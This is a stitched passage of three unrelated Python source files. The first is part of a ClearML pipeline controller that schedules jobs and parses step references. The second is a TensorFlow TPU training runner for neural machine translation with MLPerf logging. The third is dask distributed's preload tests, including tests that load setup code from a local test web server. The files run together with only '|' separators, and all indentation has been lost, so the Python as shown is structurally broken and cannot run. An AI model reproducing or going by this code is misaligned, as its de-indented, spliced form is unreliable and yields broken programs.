# if no a job ended, continue
completed_jobs = []
force_execution_plot_update = False
for j in self._running_nodes:
node = self._nodes[j]
if not node.job:
continue
if node.job.is_stopped():
completed_jobs.append(j)
node.executed = node.job.task_id() if not node.job.is_failed() else False
if j in launched_nodes:
launched_nodes.remove(j)
elif node.timeout:
started = node.job.task.data.started
if (datetime.now().astimezone(started.tzinfo) - started).total_seconds() > node.timeout:
node.job.abort()
completed_jobs.append(j)
node.executed = node.job.task_id()
elif j in launched_nodes and node.job.is_running():
# make sure update the execution graph when the job started running
# (otherwise it will still be marked queued)
launched_nodes.remove(j)
force_execution_plot_update = True
# update running jobs
self._running_nodes = [j for j in self._running_nodes if j not in completed_jobs]
# nothing changed, we can sleep
if not completed_jobs and self._running_nodes:
# force updating the pipeline state (plot) at least every 5 min.
if force_execution_plot_update or time()-last_plot_report > 5.*60:
last_plot_report = time()
self.update_execution_plot()
continue
# callback on completed jobs
if self._experiment_completed_cb or self._post_step_callbacks:
for job in completed_jobs:
job_node = self._nodes.get(job)
if not job_node:
continue
if self._experiment_completed_cb:
self._experiment_completed_cb(self, job_node)
if self._post_step_callbacks.get(job_node.name):
self._post_step_callbacks[job_node.name](self, job_node)
# Pull the next jobs in the pipeline, based on the completed list
next_nodes = []
for node in self._nodes.values():
# check if already processed or needs to be skipped
if node.job or node.executed or node.skip_job:
continue
completed_parents = [bool(p in self._nodes and self._nodes[p].executed) for p in node.parents or []]
if all(completed_parents):
next_nodes.append(node.name)
# update the execution graph
for name in next_nodes:
if self._launch_node(self._nodes[name]):
print('Launching step: {}'.format(name))
print('Parameters:\n{}'.format(self._nodes[name].job.task_parameter_override))
self._running_nodes.append(name)
launched_nodes.add(name)
# check if node is cached do not wait for event but run the loop again
if self._nodes[name].executed:
pooling_counter = 0
else:
getLogger('clearml.automation.controller').warning(
'Skipping launching step \'{}\': {}'.format(name, self._nodes[name]))
# update current state (in configuration, so that we could later continue an aborted pipeline)
self._force_task_configuration_update()
# visualize pipeline state (plot)
self.update_execution_plot()
# quit if all pipelines nodes are fully executed.
if not next_nodes and not self._running_nodes:
break
# stop all currently running jobs:
for node in self._nodes.values():
if node.executed is False:
self._pipeline_task_status_failed = True
if node.job and node.executed and not node.job.is_stopped():
node.job.abort()
elif not node.job and not node.executed:
# mark Node as skipped if it has no Job object and it is not executed
node.skip_job = True
# visualize pipeline state (plot)
self.update_execution_plot()
if self._stop_event:
# noinspection PyBroadException
try:
self._stop_event.set()
except Exception:
pass
def _parse_step_ref(self, value):
# type: (Any) -> Optional[str]
"""
Return the step reference. For example "${step1.parameters.Args/param}"
:param value: string
:return:
"""
# look for all the step references
pattern = self._step_ref_pattern
updated_value = value
if isinstance(value, str):
for g in pattern.findall(value):
# update with actual value
new_val = self.__parse_step_reference(g)
updated_value = updated_value.replace(g, new_val, 1)
return updated_value
def _parse_task_overrides(self, task_overrides):
# type: (dict) -> dict
"""
Return the step reference. For example "${step1.parameters.Args/param}"
:param task_overrides: string
:return:
"""
updated_overrides = {}
for k, v in task_overrides.items():
updated_overrides[k] = self._parse_step_ref(v)
return updated_overrides
def __verify_step_reference(self, node, step_ref_string):
# type: (PipelineController.Node, str) -> bool
"""
Verify the step reference. For example "${step1.parameters.Args/param}"
:param Node node: calling reference node (used for logging)
:param str step_ref_string: For example "${step1.parameters.Args/param}"
:return: True if valid reference
"""
parts = step_ref_string[2:-1].split('.')
v = step_ref_string
if len(parts) < 2:
raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
prev_step = parts[0]
input_type = parts[1]
if prev_step not in self._nodes:
raise ValueError("Node '{}', parameter '{}', step name '{}' is invalid".format(node.name, v, prev_step))
if input_type not in ('artifacts', 'parameters', 'models', 'id'):
raise ValueError(
"Node {}, parameter '{}', input type '{}' is invalid".format(node.name, v, input_type))
if input_type != 'id' and len(parts) < 3:
raise ValueError("Node '{}', parameter '{}' is invalid".format(node.name, v))
if input_type == 'models':
try:
model_type = parts[2].lower()
except Exception:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model_type is missing {}".format(
node.name, v, input_type, parts))
if model_type not in ('input', 'output'):
raise ValueError(
"Node '{}', parameter '{}', input type '{}', "
"model_type is invalid (input/output) found {}".format(
node.name, v, input_type, model_type))
if len(parts) < 4:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model index is missing".format(
node.name, v, input_type))
# check casting
try:
int(parts[3])
except Exception:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model index is missing {}".format(
node.name, v, input_type, parts))
if len(parts) < 5:
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model property is missing".format(
node.name, v, input_type))
if not hasattr(BaseModel, parts[4]):
raise ValueError(
"Node '{}', parameter '{}', input type '{}', model property is invalid {}".format(
node.name, v, input_type, parts[4]))
return True
def __parse_step_reference(self, step_ref_string):
"""
return the adjusted value for "${step...}"
:param step_ref_string: reference string of the form ${step_name.type.value}"
:return: str with value
"""
parts = step_ref_string[2:-1].split('.')
if len(parts) < 2:
raise ValueError("Could not parse reference '{}'".format(step_ref_string))
prev_step = parts[0]
input_type = parts[1].lower()
if prev_step not in self._nodes or (
not self._nodes[prev_step].job and
not self._nodes[prev_step].executed and
not self._nodes[prev_step].base_task_id
):
raise ValueError("Could not parse reference '{}', step '{}' could not be found".format(
step_ref_string, prev_step))
if input_type not in (
'artifacts', 'parameters', 'models', 'id',
'script', 'execution', 'container', 'output',
'comment', 'models', 'tags', 'system_tags', 'project'):
raise ValueError("Could not parse reference '{}', type '{}' not valid".format(step_ref_string, input_type))
if input_type != 'id' and len(parts) < 3:
raise ValueError("Could not parse reference '{}', missing fields in '{}'".format(step_ref_string, parts))
task = self._nodes[prev_step].job.task if self._nodes[prev_step].job \
else Task.get_task(task_id=self._nodes[prev_step].executed or self._nodes[prev_step].base_task_id)
task.reload()
if input_type == 'artifacts':
# fix \. to use . in artifacts
artifact_path = ('.'.join(parts[2:])).replace('\\.', '\\_dot_\\')
artifact_path = artifact_path.split('.')
obj = task.artifacts
for p in artifact_path:
p = p.replace('\\_dot_\\', '.')
if isinstance(obj, dict):
obj = obj.get(p)
elif hasattr(obj, p):
obj = getattr(obj, p)
else:
raise ValueError("Could not locate artifact {} on previous step {}".format(
'.'.join(parts[1:]), prev_step))
return str(obj)
elif input_type == 'parameters':
step_params = task.get_parameters()
param_name = '.'.join(parts[2:])
if param_name not in step_params:
raise ValueError("Could not locate parameter {} on previous step {}".format(
'.'.join(parts[1:]), prev_step))
return step_params.get(param_name)
elif input_type == 'models':
model_type = parts[2].lower()
if model_type not in ('input', 'output'):
raise ValueError("Could not locate model {} on previous step {}".format(
'.'.join(parts[1:]), prev_step))
try:
model_idx = int(parts[3])
model = task.models[model_type][model_idx]
except Exception:
raise ValueError("Could not locate model {} on previous step {}, index {} is invalid".format(
'.'.join(parts[1:]), prev_step, parts[3]))
return str(getattr(model, parts[4]))
elif input_type == 'id':
return task.id
elif input_type in (
'script', 'execution', 'container', 'output',
'comment', 'models', 'tags', 'system_tags', 'project'):
# noinspection PyProtectedMember
return task._get_task_property('.'.join(parts[1:]))
return None
@classmethod
def __get_node_status(cls, a_node):
# type: (PipelineController.Node) -> str
if not a_node:
return "pending"
if a_node.skip_job:
return "skipped"
if a_node.job and a_node.job.is_cached_task():
return "cached"
if a_node.job and a_node.job.task:
# no need to refresh status
return str(a_node.job.task.data.status)
if a_node.executed:
return "executed"
return "pending"
@classmethod
def __create_task_link(cls, a_node, task_link_template):
# type: (PipelineController.Node, str) -> str
if not a_node:
return ''
# create the detailed parameter table
task_id = project_id = None
if a_node.job:
project_id = a_node.job.task.project
task_id = a_node.job.task.id
elif a_node.executed:
task_id = a_node.executed
if cls._task_project_lookup.get(task_id):
project_id = cls._task_project_lookup[task_id]
else:
# noinspection PyBroadException
try:
project_id = Task.get_task(task_id=task_id).project
except Exception:
project_id = '*'
cls._task_project_lookup[task_id] = project_id
if not task_id:
return ''
return '<a href="{}"> {} </a>'.format(task_link_template.format(project=project_id, task=task_id), task_id)
|
low_level_runner.py | # Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train NMT with low level API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
import threading
import time
from six.moves import queue as Queue
import tensorflow as tf
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.framework import graph_io
from mlp_log import mlp_log
import metric
from utils import iterator_utils
_INITIAL_LOSS = 1e7
_STOP = -1
_ITEM = 1
def wrap_computation_in_while_loop(op_fn,
n,
host_name,
include_induction_variable=False):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
ops = op_fn(i) if include_induction_variable else op_fn()
if not isinstance(ops, list):
ops = [ops]
with tf.control_dependencies(ops):
return i + 1
with tf.device(device_for_host(host_name)):
return tf.while_loop(
lambda i: tf.less(i, n),
computation, [tf.constant(0)],
parallel_iterations=1)
def get_resolver(hparams):
if hparams.master:
return tf.contrib.cluster_resolver.TPUClusterResolver(hparams.master)
elif hparams.tpu_name:
return tf.contrib.cluster_resolver.TPUClusterResolver(hparams.tpu_name)
else:
return None
def get_host(resolver, hparams, host_id=0):
if resolver is None:
return "/replica:0/task:0"
elif hparams.master == "local":
return "/job:localhost/replica:0/task:0"
else:
job_name = resolver.get_job_name() or hparams.tpu_job_name or "tpu_worker"
return "/job:%s/task:%d" % (job_name, host_id)
def device_for_host(host_name):
return host_name + "/device:CPU:0"
def device_for_tpu_core(host_name, core=0):
return host_name + "/device:TPU_REPLICATED_CORE:%d" % core
class LowLevelRunner(object):
"""Run Train via direct session.run calls."""
def __init__(self,
hparams,
train_iterations,
eval_steps,
per_host_v1=False):
tf.logging.info("TrainLowLevelRunner: constructor")
self.feature_structure = {}
self.eval_feature_structure = {}
self.loss = None
self.infeed_queue = []
self.eval_infeed_queue = []
self.enqueue_ops = []
self.eval_enqueue_ops = []
self.dataset_initializer = []
self.eval_dataset_initializer = []
self.is_local = ((hparams.master == "") and (hparams.tpu_name is None))
self.per_host_v1 = per_host_v1
self.iterations = train_iterations
self.eval_steps = eval_steps
self.outfeed_tensors = []
self.outfeed_names = []
self.dequeue_ops = []
self.predictions = {}
self.sess = None
self.graph = tf.Graph()
self.hparams = hparams
self.num_hosts = hparams.num_shards // hparams.num_shards_per_host
with self.graph.as_default():
self.tpu_init = [tpu.initialize_system()]
self.tpu_shutdown = tpu.shutdown_system()
self.resolver = get_resolver(hparams)
session_config = tf.ConfigProto(
allow_soft_placement=True,
isolate_session_state=True,
operation_timeout_in_ms=600 * 60 * 1000,
graph_options=tf.GraphOptions(
rewrite_options=rewriter_config_pb2.RewriterConfig(
disable_meta_optimizer=True)))
if self.hparams.tpu_name is None:
master = self.hparams.master
else:
cluster_spec = self.resolver.cluster_spec()
if cluster_spec:
session_config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
master = self.resolver.get_master()
self.sess = tf.Session(master, graph=self.graph, config=session_config)
self.sess.run(self.tpu_init)
def initialize(self, input_fn, eval_input_fn, params):
"""Initialize all the things required for training."""
tf.logging.info("TrainLowLevelRunner: initialize method")
def get_enqueue_ops_fn(host_id):
"""Generate the enqueue ops graph function."""
device = device_for_host(get_host(self.resolver, self.hparams, host_id))
if host_id in range(0, self.hparams.num_infeed_workers * 2, 2):
with tf.device(device):
params["batch_size"] = self.hparams.batch_size
params["dataset_num_shards"] = self.hparams.num_infeed_workers
params["dataset_index"] = host_id // 2
output = input_fn(params)
if not self.hparams.use_synthetic_data:
iterator = output.make_initializable_iterator()
self.dataset_initializer.append(iterator.initializer)
if host_id == 0:
f = iterator.get_next()
self.feature_structure["features"] = {
k: tf.zeros_like(f[k]) for k in f
}
else:
self.feature_structure["features"] = output
self.feature_structure["core_id"] = tf.constant([1], tf.int32)
def enqueue_ops_fn(idx):
"""Enqueue ops function for one host.."""
with tf.device(device):
sharded_inputs = []
start_idx = 0
if host_id in range(0, self.hparams.num_infeed_workers * 2, 2):
core_id = tf.constant(
host_id * self.hparams.num_shards_per_host,
shape=[1],
dtype=tf.int32)
if self.hparams.use_synthetic_data:
features = output
else:
def true_fn():
return iterator.get_next()
def false_fn():
return {
k: tf.zeros_like(self.feature_structure["features"][k])
for k in self.feature_structure["features"]
}
features = tf.cond(
tf.equal(idx % self.hparams.num_infeed_workers, host_id // 2),
true_fn, false_fn)
sharded_inputs.append(
data_nest.flatten({
"features": features,
"core_id": core_id
}))
start_idx = 1
for i in range(start_idx, self.hparams.num_shards_per_host):
sharded_inputs.append(
data_nest.flatten({
"features": {
k: tf.zeros_like(self.feature_structure["features"][k])
for k in self.feature_structure["features"]
},
"core_id":
tf.constant(
host_id * self.hparams.num_shards_per_host + i,
shape=[1],
dtype=tf.int32)
}))
infeed = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(sharded_inputs[0]))
self.infeed_queue.append(infeed)
def tpu_ordinal_fn(shard_index_in_host):
return shard_index_in_host % self.hparams.num_shards_per_host
return infeed.generate_enqueue_ops(
sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)
return enqueue_ops_fn
def get_eval_enqueue_ops_fn(host_id):
"""Generate the enqueue ops graph function."""
params["dataset_num_shards"] = self.num_hosts
params["dataset_index"] = host_id
with tf.device(
device_for_host(get_host(self.resolver, self.hparams, host_id))):
dataset = eval_input_fn(params)
iterator = dataset.make_initializable_iterator()
self.eval_dataset_initializer.append(iterator.initializer)
def enqueue_ops_fn():
"""Enqueue ops function for one host."""
per_host_sharded_inputs = []
control_deps = []
for _ in range(self.hparams.num_shards_per_host):
with tf.control_dependencies(control_deps):
features = iterator.get_next()
self.eval_feature_structure["features"] = features
flattened_inputs = data_nest.flatten(self.eval_feature_structure)
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
infeed = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
self.eval_infeed_queue.append(infeed)
def tpu_ordinal_fn(shard_index_in_host):
return shard_index_in_host % self.hparams.num_shards_per_host
return infeed.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)
return enqueue_ops_fn
with self.graph.as_default():
if self.iterations > 0:
for i in range(self.num_hosts):
self.enqueue_ops.append(
wrap_computation_in_while_loop(
get_enqueue_ops_fn(i),
n=self.iterations,
host_name=get_host(self.resolver, self.hparams, i),
include_induction_variable=True))
if self.eval_steps > 0:
for i in range(0, self.num_hosts):
self.eval_enqueue_ops.append(
wrap_computation_in_while_loop(
get_eval_enqueue_ops_fn(i),
n=self.eval_steps,
host_name=get_host(self.resolver, self.hparams, i)))
init_tables = tf.tables_initializer()
self.sess.run(init_tables)
self.sess.run(self.dataset_initializer)
def build_model(self, model_fn, params):
"""Build the TPU model and infeed enqueue ops."""
tf.logging.info("TrainLowLevelRunner: build_model method")
def tpu_train_step(loss):
"""Generate the TPU graph."""
del loss
values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
unflattened_inputs = data_nest.pack_sequence_as(self.feature_structure,
values)
features = unflattened_inputs["features"]
core_id = unflattened_inputs["core_id"]
new_features = {}
for k in features:
s = features[k].shape.as_list()
s = [self.hparams.num_shards, s[0] // self.hparams.num_shards] + s[1:]
new_features[k] = tf.squeeze(
tf.gather(
tf.reshape(tpu_ops.cross_replica_sum(features[k]), s), core_id),
[0])
estimator_spec = model_fn(new_features, None, tf.estimator.ModeKeys.TRAIN,
params)
loss, train_op = estimator_spec.loss, estimator_spec.train_op
with tf.control_dependencies([train_op]):
return tf.identity(loss)
@tpu_function.on_device_training_loop
def train_loop():
return training_loop.repeat(self.iterations, tpu_train_step,
[_INITIAL_LOSS])
def tpu_eval_step():
"""Generate the TPU graph."""
values = self.eval_infeed_queue[0].generate_dequeue_op(tpu_device=0)
unflattened_inputs = data_nest.pack_sequence_as(
self.eval_feature_structure, values)
features = unflattened_inputs["features"]
estimator_spec = model_fn(features, None, tf.estimator.ModeKeys.PREDICT,
params)
for k, v in six.iteritems(estimator_spec.predictions):
self.outfeed_names.append(k)
self.outfeed_tensors.append(v)
with tf.device(
device_for_tpu_core(get_host(self.resolver, self.hparams))):
outfeed_enqueue_ops = tpu_ops.outfeed_enqueue_tuple(
self.outfeed_tensors)
with tf.control_dependencies([outfeed_enqueue_ops]):
return tf.no_op()
@tpu_function.on_device_training_loop
def eval_loop():
if self.eval_steps > 0:
return training_loop.repeat(self.eval_steps, tpu_eval_step, [])
else:
return tf.no_op()
def train_eval_step():
with tf.control_dependencies(train_loop()):
return eval_loop()
def train_eval_loop():
return training_loop.repeat(self.hparams.max_train_epochs,
train_eval_step, [])
def create_dequeue_ops(host_id):
"""Create outfeed dequeue ops."""
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for v in self.outfeed_tensors:
dequeue_ops.append([])
tensor_dtypes.append(v.dtype)
tensor_shapes.append(v.shape)
for i in range(self.hparams.num_shards_per_host):
with tf.device(
device_for_host(get_host(self.resolver, self.hparams, host_id))):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes, shapes=tensor_shapes, device_ordinal=i)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
for j in range(len(outfeed_tensors)):
dequeue_ops[j] = tf.concat(dequeue_ops[j], axis=0)
return dequeue_ops
with self.graph.as_default():
if self.eval_steps <= 0:
(self.loss,) = tpu.shard(
train_loop,
inputs=[],
num_shards=self.hparams.num_shards,
outputs_from_all_shards=False,
)
else:
(
self.compile_op,
self.train_eval_op,
) = tpu.split_compile_and_shard(
train_eval_loop,
inputs=[],
num_shards=self.hparams.num_shards,
outputs_from_all_shards=False)
if self.eval_steps > 0:
for i in range(0, self.num_hosts):
self.dequeue_ops.append({})
host_dequeue_ops = create_dequeue_ops(i)
for j, dequeue_tenor in enumerate(host_dequeue_ops):
self.dequeue_ops[i][self.outfeed_names[j]] = dequeue_tenor
global_initializer = tf.global_variables_initializer()
local_initializer = tf.local_variables_initializer()
self.sess.run(global_initializer)
self.sess.run(local_initializer)
graph_io.write_graph(
self.graph.as_graph_def(add_shapes=True), self.hparams.out_dir,
"graph.pbtxt")
self.saver = tf.train.Saver()
def train(self,
start_step,
train_steps,
num_threads=2,
checkpoint_threads=None):
"""Run the Train loop on the TPU device."""
tf.logging.info("TrainLowLevelRunner: train for %d steps in total",
train_steps)
def infeed_thread_fn(sess, enqueue_ops):
assert train_steps % self.iterations == 0
steps = train_steps // self.iterations
for _ in range(steps):
sess.run([enqueue_ops])
def checkpoint_thread_fn(saver, sess):
saver.save(sess, self.hparams.out_dir + "/model.ckpt-%d" % (start_step + cur_step))
infeed_thread = threading.Thread(
target=infeed_thread_fn, args=(self.sess, self.enqueue_ops))
infeed_thread.start()
cur_step = 0
thread_id = 0
need_join = False
if checkpoint_threads is None and num_threads > 0:
checkpoint_threads = []
need_join = True
for i in range(num_threads):
checkpoint_threads.append(None)
while cur_step < train_steps:
start = time.time()
tf.logging.info("TrainLowLevelRunner: start train step:%d",
start_step + cur_step)
cur_step += self.iterations
loss = self.sess.run([self.loss])
tf.logging.info("TrainLowLevelRunner: sess run loss: %s", loss)
if num_threads > 0:
if checkpoint_threads[thread_id] is not None:
checkpoint_threads[thread_id].join()
checkpoint_threads[thread_id] = threading.Thread(
target=checkpoint_thread_fn, args=(self.saver, self.sess))
checkpoint_threads[thread_id].start()
thread_id += 1
if thread_id >= num_threads:
thread_id = 0
end = time.time()
tf.logging.info(
"TrainLowLevelRunner: step time {} sec {} examples/sec".format(
end - start,
self.iterations * self.hparams.batch_size / (end - start)))
infeed_thread.join()
if need_join:
for i in range(num_threads):
if checkpoint_threads[i] is not None:
checkpoint_threads[i].join()
checkpoint_threads[i] = None
def predict(self, checkpoint_path=None):
"""Run the predict loop on the TPU device."""
if not checkpoint_path:
checkpoint_path = tf.train.latest_checkpoint(self.hparams.out_dir)
if self.iterations == 0:
self.saver.restore(self.sess, checkpoint_path)
queue = Queue.Queue()
def dequeue_thread_fn(sess, dequeue_ops, i):
while True:
item = queue.get(block=True)
if item == _STOP:
return
self.predictions[i] = sess.run(dequeue_ops)
queue.task_done()
dequeue_threads = [None] * self.num_hosts
for i in range(self.num_hosts):
dequeue_threads[i] = threading.Thread(
target=dequeue_thread_fn, args=(self.sess, self.dequeue_ops[i], i))
dequeue_threads[i].start()
for step in range(self.eval_steps):
tf.logging.info("TrainAndEvalLowLevelRunner: start eval step:%d", step)
for i in range(self.num_hosts):
queue.put(_ITEM)
queue.join()
for j in range(self.num_hosts):
for i in range(self.hparams.infer_batch_size // self.num_hosts):
yield {
key: value[i] for key, value in six.iteritems(self.predictions[j])
}
for i in range(self.num_hosts):
queue.put(_STOP)
for i in range(self.num_hosts):
dequeue_threads[i].join()
def train_and_predict(self):
"""Run the predict loop on the TPU device."""
self.sess.run([self.compile_op])
# Train and eval thread.
def train_eval_thread_fn(sess, train_eval_op):
tf.logging.info("train_eval_op start")
sess.run([train_eval_op])
train_eval_thread = threading.Thread(
target=train_eval_thread_fn, args=(self.sess, self.train_eval_op))
train_eval_thread.start()
# Infeed thread.
def infeed_thread_fn(sess, train_enqueue_ops, eval_enqueue_ops, eval_init):
"""Start the infeed."""
time.sleep(300)
mlp_log.mlperf_print("init_stop", None)
mlp_log.mlperf_print("run_start", None)
for i in range(self.hparams.max_train_epochs):
tf.logging.info("Infeed for epoch: %d", i + 1)
mlp_log.mlperf_print(
"block_start",
None,
metadata={
"first_epoch_num": i + 1,
"epoch_count": 1
})
mlp_log.mlperf_print("epoch_start", None, metadata={"epoch_num": i + 1})
sess.run(eval_init)
sess.run([train_enqueue_ops])
sess.run([eval_enqueue_ops])
infeed_thread = threading.Thread(
target=infeed_thread_fn,
args=(self.sess, self.enqueue_ops, self.eval_enqueue_ops,
self.eval_dataset_initializer))
infeed_thread.start()
if self.eval_steps > 0:
eval_state = {"run_success": False, "score": 0.0}
for epoch in range(self.hparams.max_train_epochs):
predictions = list(self.predict())
mlp_log.mlperf_print(
"eval_start", None, metadata={"epoch_num": epoch + 1})
current_step = epoch * self.iterations
eval_state["score"] = metric.get_metric(self.hparams, predictions,
current_step)
tf.logging.info("Score after epoch %d: %f", epoch, eval_state["score"])
mlp_log.mlperf_print(
"eval_accuracy",
eval_state["score"],
metadata={"epoch_num": epoch + 1})
mlp_log.mlperf_print(
"eval_stop", None, metadata={"epoch_num": epoch + 1})
mlp_log.mlperf_print(
"block_stop",
None,
metadata={
"first_epoch_num": epoch,
"epoch_count": 1
})
if eval_state["score"] >= self.hparams.target_bleu:
eval_state["run_success"] = True
mlp_log.mlperf_print("run_stop", None, metadata={"status": "success"})
break
if not eval_state["run_success"]:
mlp_log.mlperf_print("run_stop", None, metadata={"status": "abort"})
infeed_thread.join()
train_eval_thread.join()
if self.eval_steps > 0:
return eval_state["score"], current_step
else:
return None, None
|
test_preload.py | import multiprocessing
import os
import shutil
import sys
import tempfile
import urllib.error
import urllib.request
from textwrap import dedent
from time import sleep
import pytest
import tornado
from tornado import web
import dask
from distributed import Client, Nanny, Scheduler, Worker
from distributed.compatibility import MACOS
from distributed.metrics import time
from distributed.utils_test import captured_logger, cluster, gen_cluster, gen_test
PY_VERSION = sys.version_info[:2]
PRELOAD_TEXT = """
_worker_info = {}
def dask_setup(worker):
_worker_info['address'] = worker.address
def get_worker_address():
return _worker_info['address']
"""
def test_worker_preload_file(loop):
def check_worker():
import worker_info
return worker_info.get_worker_address()
tmpdir = tempfile.mkdtemp()
try:
path = os.path.join(tmpdir, "worker_info.py")
with open(path, "w") as f:
f.write(PRELOAD_TEXT)
with cluster(worker_kwargs={"preload": [path]}) as (s, workers), Client(
s["address"], loop=loop
) as c:
assert c.run(check_worker) == {
worker["address"]: worker["address"] for worker in workers
}
finally:
shutil.rmtree(tmpdir)
@gen_test()
async def test_worker_preload_text():
text = """
def dask_setup(worker):
worker.foo = 'setup'
"""
async with Scheduler(dashboard_address=":0", preload=text) as s:
assert s.foo == "setup"
async with Worker(s.address, preload=[text]) as w:
assert w.foo == "setup"
@gen_cluster(nthreads=[])
async def test_worker_preload_config(s):
text = """
def dask_setup(worker):
worker.foo = 'setup'
def dask_teardown(worker):
worker.foo = 'teardown'
"""
with dask.config.set(
{"distributed.worker.preload": [text], "distributed.nanny.preload": [text]}
):
async with Nanny(s.address) as w:
assert w.foo == "setup"
async with Client(s.address, asynchronous=True) as c:
d = await c.run(lambda dask_worker: dask_worker.foo)
assert d == {w.worker_address: "setup"}
assert w.foo == "teardown"
def test_worker_preload_module(loop):
def check_worker():
import worker_info
return worker_info.get_worker_address()
tmpdir = tempfile.mkdtemp()
sys.path.insert(0, tmpdir)
try:
path = os.path.join(tmpdir, "worker_info.py")
with open(path, "w") as f:
f.write(PRELOAD_TEXT)
with cluster(worker_kwargs={"preload": ["worker_info"]}) as (
s,
workers,
), Client(s["address"], loop=loop) as c:
assert c.run(check_worker) == {
worker["address"]: worker["address"] for worker in workers
}
finally:
sys.path.remove(tmpdir)
shutil.rmtree(tmpdir)
@gen_cluster(nthreads=[])
async def test_worker_preload_click(s):
text = """
import click
@click.command()
def dask_setup(worker):
worker.foo = 'setup'
"""
async with Worker(s.address, preload=text) as w:
assert w.foo == "setup"
@gen_cluster(nthreads=[])
async def test_worker_preload_click_async(s, tmpdir):
# Ensure we allow for click commands wrapping coroutines
# https://github.com/dask/distributed/issues/4169
text = """
import click
@click.command()
async def dask_setup(worker):
worker.foo = 'setup'
"""
async with Worker(s.address, preload=text) as w:
assert w.foo == "setup"
@pytest.mark.asyncio
async def test_preload_import_time(cleanup):
text = """
from distributed.comm.registry import backends
from distributed.comm.tcp import TCPBackend
backends["foo"] = TCPBackend()
""".strip()
try:
async with Scheduler(dashboard_address=":0", preload=text, protocol="foo") as s:
async with Nanny(s.address, preload=text, protocol="foo") as n:
async with Client(s.address, asynchronous=True) as c:
await c.wait_for_workers(1)
finally:
from distributed.comm.registry import backends
del backends["foo"]
class MyHandler(web.RequestHandler):
def get(self):
self.write(
"""
def dask_setup(dask_server):
dask_server.foo = 1
""".strip()
)
def create_preload_application():
app = web.Application([(r"/preload", MyHandler)])
server = app.listen(12345, address="127.0.0.1")
tornado.ioloop.IOLoop.instance().start()
@pytest.fixture
def scheduler_preload():
p = multiprocessing.Process(target=create_preload_application)
p.start()
start = time()
while not p.is_alive():
if time() > start + 5:
raise AssertionError("Process didn't come up")
sleep(0.5)
# Make sure we can query the server
start = time()
request = urllib.request.Request("http://127.0.0.1:12345/preload", method="GET")
while True:
try:
response = urllib.request.urlopen(request)
if response.status == 200:
break
except urllib.error.URLError as e:
if time() > start + 10:
raise AssertionError("Webserver didn't come up", e)
sleep(0.5)
yield
p.kill()
p.join(timeout=5)
@pytest.mark.skipif(
MACOS and PY_VERSION == (3, 7), reason="HTTP Server doesn't come up"
)
@pytest.mark.asyncio
async def test_web_preload(cleanup, scheduler_preload):
with captured_logger("distributed.preloading") as log:
async with Scheduler(
host="localhost",
preload=["http://127.0.0.1:12345/preload"],
) as s:
assert s.foo == 1
assert "12345/preload" in log.getvalue()
@gen_cluster(nthreads=[])
async def test_scheduler_startup(s):
text = f"""
import dask
dask.config.set(scheduler_address="{s.address}")
"""
async with Worker(preload=text) as w:
assert w.scheduler.address == s.address
@gen_cluster(nthreads=[])
async def test_scheduler_startup_nanny(s):
text = f"""
import dask
dask.config.set(scheduler_address="{s.address}")
"""
async with Nanny(preload_nanny=text) as w:
assert w.scheduler.address == s.address
class WorkerPreloadHandler(web.RequestHandler):
def get(self):
self.write(
"""
import dask
dask.config.set(scheduler_address="tcp://127.0.0.1:8786")
""".strip()
)
def create_worker_preload_application():
application = web.Application([(r"/preload", WorkerPreloadHandler)])
server = application.listen(12346, address="127.0.0.1")
tornado.ioloop.IOLoop.instance().start()
@pytest.fixture
def worker_preload():
p = multiprocessing.Process(target=create_worker_preload_application)
p.start()
start = time()
while not p.is_alive():
if time() > start + 5:
raise AssertionError("Process didn't come up")
sleep(0.5)
# Make sure we can query the server
request = urllib.request.Request("http://127.0.0.1:12346/preload", method="GET")
start = time()
while True:
try:
response = urllib.request.urlopen(request)
if response.status == 200:
break
except urllib.error.URLError as e:
if time() > start + 10:
raise AssertionError("Webserver didn't come up", e)
sleep(0.5)
yield
p.kill()
p.join(timeout=5)
@pytest.mark.skipif(
MACOS and PY_VERSION == (3, 7), reason="HTTP Server doesn't come up"
)
@pytest.mark.asyncio
async def test_web_preload_worker(cleanup, worker_preload):
async with Scheduler(port=8786, host="localhost") as s:
async with Nanny(preload_nanny=["http://127.0.0.1:12346/preload"]) as nanny:
assert nanny.scheduler_addr == s.address
# This test is blocked on https://github.com/dask/distributed/issues/5819
@pytest.mark.xfail(
reason="The preload argument to the client isn't supported yet", strict=True
)
@gen_cluster(nthreads=[])
async def test_client_preload_text(s: Scheduler):
text = dedent(
"""\
def dask_setup(client):
client.foo = "setup"
def dask_teardown(client):
client.foo = "teardown"
"""
)
async with Client(address=s.address, asynchronous=True, preload=text) as c:
assert c.foo == "setup"
assert c.foo == "teardown"
@gen_cluster(nthreads=[])
async def test_client_preload_config(s):
text = dedent(
"""\
def dask_setup(client):
client.foo = "setup"
